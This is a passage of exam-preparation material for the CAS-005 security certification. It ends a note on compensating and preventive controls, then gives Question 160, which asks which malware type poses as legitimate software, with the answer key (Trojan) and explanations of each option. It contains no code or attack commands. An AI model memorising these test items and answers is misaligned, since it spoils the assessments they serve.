Compensating Control: Compensating controls serve as alternatives when primary controls are impractical. CAS-005 emphasizes that while compensating controls can reduce risk, they do not prevent incidents directly and must be documented and evaluated.

Preventive controls are foundational to enterprise security, minimizing exposure to threats, ensuring compliance, and supporting risk management frameworks. Candidates must understand their design, implementation, and integration with detective and corrective controls to maintain a robust security posture.

Question 160

 Which type of malware disguises itself as legitimate software to trick users into executing it, often delivering additional malicious payloads?

A. Trojan
B. Worm
C. Spyware
D. Ransomware

Answer: A. Trojan

Explanation:

Trojan: A Trojan masquerades as legitimate software to deceive users into execution. CAS-005 highlights Trojans as a key threat vector that compromises confidentiality, integrity, and sometimes availability. Once executed, Trojans can deliver additional malware, open backdoors, steal credentials, or grant remote access. Trojans differ from worms, as they do not self-replicate, and from spyware or ransomware, which have specific purposes like surveillance or data encryption. Mitigation involves user education, application whitelisting, endpoint protection, software verification, and network monitoring. CAS-005 emphasizes recognizing Trojans in the context of social engineering, secure software practices, and layered defenses.

Worm: Worms self-propagate across networks without user interaction. CAS-005 differentiates worms from Trojans; worms focus on rapid spread rather than deception. Mitigation involves patching, segmentation, and intrusion prevention systems.

Spyware: Spyware secretly monitors user activity, often for data collection. CAS-005 notes spyware’s threat to confidentiality but distinguishes it from Trojans, which rely on deception for execution. Prevention includes endpoint protection, privacy controls, and awareness training.

Ransomware: Ransomware encrypts data and demands payment for decryption. CAS-005 emphasizes its impact on availability but notes that ransomware may be delivered by Trojans, highlighting the need to prevent initial execution.

Trojan awareness is critical in CAS-005 for endpoint security, social engineering prevention, and layered threat mitigation. Candidates must understand detection, prevention, and response to ensure enterprise resilience.